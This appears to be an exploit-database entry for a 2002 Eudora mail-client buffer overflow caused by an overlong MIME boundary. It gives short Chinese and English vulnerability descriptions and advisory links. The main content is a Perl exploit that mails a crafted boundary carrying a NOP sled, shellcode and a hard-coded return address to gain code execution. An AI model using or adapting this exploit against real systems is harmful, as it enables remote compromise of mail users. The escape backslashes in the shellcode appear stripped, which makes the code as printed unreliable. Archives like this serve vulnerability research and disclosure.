https://www.exploit-db.com/exploits/21680
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-104

Eudora是一款由QUALCOMM公开开发的邮件用户代理，可运行在Windows和MacOS操作系统下。Eudora在接收到信息时没有对boundary值进行充分检查，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。邮件中常用到复合类型，multipart类型表示正文是由多个部分组成，如html，附件等组成，由于复合类型由多个部分组成，因此使用一个成为boundary的隔符来分隔这多个部分。Eudora没有充分检查邮件中boundary值的边界长度，攻击者可以编辑使用超长的字符串作为boundary值的邮件提交给Eudora用户，可导致Eudora产生缓冲溢出，精心构建boundary值可导致以Eudora进程在系统上执行任意指令。

source: http://www.securityfocus.com/bid/5397/info

A buffer overflow vulnerability has been reported in Qualcomm's Eudora mail client for Windows systems. The condition occurs if a MIME multipart boundary is of excessive length. Remote attackers may exploit this vulnerability to execute arbitrary code.

#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <[email protected]>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use Socket;

$connect_host   = 'mail.jumperz.net';
$port           = 25;
$env_from       = '[email protected]';
$env_to         = '[email protected]';
$from           = '[email protected]';
$to             = '[email protected]';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.n";
connect(SOCKET,$sock_addr) || die "Connect Errorn";
select(SOCKET); $|=1; select(STDOUT);

        #egg written by UNYUN (http://www.shadowpenguin.org/)
        #57bytes
$egg  = "xEBx27x8Bx34x24x33xC9x33xD2xB2";
$egg .= "x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7";
$egg .= "xE6x77xB1x05xB2x04x2BxE2x89x0C";
$egg .= "x24x2BxE2x89x34x24xFFxD0x90xEB";
$egg .= "xFDxE8xD4xFFxFFxFF";
$egg .= "notepad.exe";

$buf  = "x90" x 121;
$buf .= $egg;
$buf .= "xEBxA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "x97xACxE3x77"; #0x77e3ac97 JMP EBX in user32.dll

$hoge = <SOCKET>;
print SOCKET "HELO hogex0Dx0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>x0Dx0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>x0Dx0A";
$hoge = <SOCKET>;
print SOCKET "DATAx0Dx0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0x0D
>From: $fromx0D
To: $tox0D
Content-Type: multipart/mixed; boundary="$buf"x0D
x0D
.x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUITx0Dx0A";
$hoge = <SOCKET>;

来源:BUGTRAQ
名称:20020805[SNSAdvisoryNo.55]Eudora5.xforWindowsBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=102858453720304&w;=2
来源:BID
名称:5397
链接:http://www.securityfocus.com/bid/5397
来源:XF
名称:eudora-boundary-bo(9765)
链接:http://www.iss.net/security_center/static/9765.php
来源:BUGTRAQ
名称:20020808[SNSAdvisoryNo.55rev.2]Eudora5.xforWindowsBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=102883538924494&w;=2